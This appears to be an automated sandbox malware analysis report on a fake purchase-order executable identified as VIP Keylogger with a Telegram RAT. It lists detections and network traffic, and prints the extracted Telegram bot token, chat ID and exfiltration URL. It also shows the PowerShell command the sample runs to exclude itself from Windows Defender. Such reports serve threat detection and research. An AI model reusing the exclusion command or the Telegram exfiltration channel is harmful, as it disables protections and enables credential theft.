Edit tour

Windows Analysis Report
PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Overview

General Information

Sample name:	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Analysis ID:	1576077
MD5:	4b393b41e5b7bdd02e481816bec9ff4a
SHA1:	35b60bdfa5130cc88b508f4fee9c226a2277517b
SHA256:	b71fb82589e3532a9390352bc87f7c2edc2cd7fae723fe203500350a31559e17
Tags:	exeuser-adrian__luca
Infos:

Detection

VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe (PID: 2896 cmdline: "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe" MD5: 4B393B41E5B7BDD02E481816BEC9FF4A)

powershell.exe (PID: 5216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe" MD5: 4B393B41E5B7BDD02E481816BEC9FF4A)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat id": "-4517865277", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d031:$a1: get_encryptedPassword 0x2d346:$a2: get_encryptedUsername 0x2ce41:$a3: get_timePasswordChanged 0x2cf4a:$a4: get_passwordField 0x2d047:$a5: set_encryptedPassword 0x2e6e5:$a7: get_logins 0x2e648:$a10: KeyLoggerEventArgs 0x2e2ad:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ddc9:$a1: get_encryptedPassword 0x707e9:$a1: get_encryptedPassword 0xb3009:$a1: get_encryptedPassword 0x2e0de:$a2: get_encryptedUsername 0x70afe:$a2: get_encryptedUsername 0xb331e:$a2: get_encryptedUsername 0x2dbd9:$a3: get_timePasswordChanged 0x705f9:$a3: get_timePasswordChanged 0xb2e19:$a3: get_timePasswordChanged 0x2dce2:$a4: get_passwordField 0x70702:$a4: get_passwordField 0xb2f22:$a4: get_passwordField 0x2dddf:$a5: set_encryptedPassword 0x707ff:$a5: set_encryptedPassword 0xb301f:$a5: set_encryptedPassword 0x2f47d:$a7: get_logins 0x71e9d:$a7: get_logins 0xb46bd:$a7: get_logins 0x2f3e0:$a10: KeyLoggerEventArgs 0x71e00:$a10: KeyLoggerEventArgs 0xb4620:$a10: KeyLoggerEventArgs
Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x58c5:$a1: get_encryptedPassword 0x5bd0:$a2: get_encryptedUsername 0x56df:$a3: get_timePasswordChanged 0x57e8:$a4: get_passwordField 0x58db:$a5: set_encryptedPassword 0x7d7e:$a7: get_logins 0x7ce1:$a10: KeyLoggerEventArgs 0x794a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5cab5:$a1: get_encryptedPassword 0x5cdc0:$a2: get_encryptedUsername 0x5c8cf:$a3: get_timePasswordChanged 0x5c9d8:$a4: get_passwordField 0x5cacb:$a5: set_encryptedPassword 0x5ef6e:$a7: get_logins 0x5eed1:$a10: KeyLoggerEventArgs 0x5eb3a:$a11: KeyLoggerEventArgsEventHandler
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d231:$a1: get_encryptedPassword 0x2d546:$a2: get_encryptedUsername 0x2d041:$a3: get_timePasswordChanged 0x2d14a:$a4: get_passwordField 0x2d247:$a5: set_encryptedPassword 0x2e8e5:$a7: get_logins 0x2e848:$a10: KeyLoggerEventArgs 0x2e4ad:$a11: KeyLoggerEventArgsEventHandler
4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b133:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a7d6:$a3: \Google\Chrome\User Data\Default\Login Data 0x3aa33:$a4: \Orbitum\User Data\Default\Login Data 0x3b412:$a5: \Kometa\User Data\Default\Login Data
4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de3c:$s1: UnHook 0x2de43:$s2: SetHook 0x2de4b:$s3: CallNextHook 0x2de58:$s4: _hook
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b431:$a1: get_encryptedPassword 0x2b746:$a2: get_encryptedUsername 0x2b241:$a3: get_timePasswordChanged 0x2b34a:$a4: get_passwordField 0x2b447:$a5: set_encryptedPassword 0x2cae5:$a7: get_logins 0x2ca48:$a10: KeyLoggerEventArgs 0x2c6ad:$a11: KeyLoggerEventArgsEventHandler
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39333:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x389d6:$a3: \Google\Chrome\User Data\Default\Login Data 0x38c33:$a4: \Orbitum\User Data\Default\Login Data 0x39612:$a5: \Kometa\User Data\Default\Login Data
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c03c:$s1: UnHook 0x2c043:$s2: SetHook 0x2c04b:$s3: CallNextHook 0x2c058:$s4: _hook
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b431:$a1: get_encryptedPassword 0x2b746:$a2: get_encryptedUsername 0x2b241:$a3: get_timePasswordChanged 0x2b34a:$a4: get_passwordField 0x2b447:$a5: set_encryptedPassword 0x2cae5:$a7: get_logins 0x2ca48:$a10: KeyLoggerEventArgs 0x2c6ad:$a11: KeyLoggerEventArgsEventHandler
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39333:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x389d6:$a3: \Google\Chrome\User Data\Default\Login Data 0x38c33:$a4: \Orbitum\User Data\Default\Login Data 0x39612:$a5: \Kometa\User Data\Default\Login Data
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c03c:$s1: UnHook 0x2c043:$s2: SetHook 0x2c04b:$s3: CallNextHook 0x2c058:$s4: _hook
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d231:$a1: get_encryptedPassword 0x6fa51:$a1: get_encryptedPassword 0x2d546:$a2: get_encryptedUsername 0x6fd66:$a2: get_encryptedUsername 0x2d041:$a3: get_timePasswordChanged 0x6f861:$a3: get_timePasswordChanged 0x2d14a:$a4: get_passwordField 0x6f96a:$a4: get_passwordField 0x2d247:$a5: set_encryptedPassword 0x6fa67:$a5: set_encryptedPassword 0x2e8e5:$a7: get_logins 0x71105:$a7: get_logins 0x2e848:$a10: KeyLoggerEventArgs 0x71068:$a10: KeyLoggerEventArgs 0x2e4ad:$a11: KeyLoggerEventArgsEventHandler 0x70ccd:$a11: KeyLoggerEventArgsEventHandler
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de3c:$s1: UnHook 0x7065c:$s1: UnHook 0x2de43:$s2: SetHook 0x70663:$s2: SetHook 0x2de4b:$s3: CallNextHook 0x7066b:$s3: CallNextHook 0x2de58:$s4: _hook 0x70678:$s4: _hook
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d231:$a1: get_encryptedPassword 0x6fc51:$a1: get_encryptedPassword 0xb2471:$a1: get_encryptedPassword 0x2d546:$a2: get_encryptedUsername 0x6ff66:$a2: get_encryptedUsername 0xb2786:$a2: get_encryptedUsername 0x2d041:$a3: get_timePasswordChanged 0x6fa61:$a3: get_timePasswordChanged 0xb2281:$a3: get_timePasswordChanged 0x2d14a:$a4: get_passwordField 0x6fb6a:$a4: get_passwordField 0xb238a:$a4: get_passwordField 0x2d247:$a5: set_encryptedPassword 0x6fc67:$a5: set_encryptedPassword 0xb2487:$a5: set_encryptedPassword 0x2e8e5:$a7: get_logins 0x71305:$a7: get_logins 0xb3b25:$a7: get_logins 0x2e848:$a10: KeyLoggerEventArgs 0x71268:$a10: KeyLoggerEventArgs 0xb3a88:$a10: KeyLoggerEventArgs
0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de3c:$s1: UnHook 0x7085c:$s1: UnHook 0xb307c:$s1: UnHook 0x2de43:$s2: SetHook 0x70863:$s2: SetHook 0xb3083:$s2: SetHook 0x2de4b:$s3: CallNextHook 0x7086b:$s3: CallNextHook 0xb308b:$s3: CallNextHook 0x2de58:$s4: _hook 0x70878:$s4: _hook 0xb3098:$s4: _hook
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", ParentImage: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, ParentProcessId: 2896, ParentProcessName: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", ProcessId: 5216, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", ParentImage: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, ParentProcessId: 2896, ParentProcessName: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe", ProcessId: 5216, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T14:14:19.127433+0100	2803305	3	Unknown Traffic	192.168.2.4	49737	172.67.177.134	443	TCP
2024-12-16T14:14:29.738608+0100	2803305	3	Unknown Traffic	192.168.2.4	49747	172.67.177.134	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T14:14:14.630603+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	132.226.8.169	80	TCP
2024-12-16T14:14:17.427453+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	132.226.8.169	80	TCP
2024-12-16T14:14:20.739935+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	132.226.8.169	80	TCP
2024-12-16T14:14:24.224485+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A", "Chat id": "-4517865277", "Version": "4.4"}
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7340.4.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendMessage"}

Multi AV Scanner detection for submitted file

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49736 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50087 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50104 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50107 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50108 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50112 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50122 version: TLS 1.2
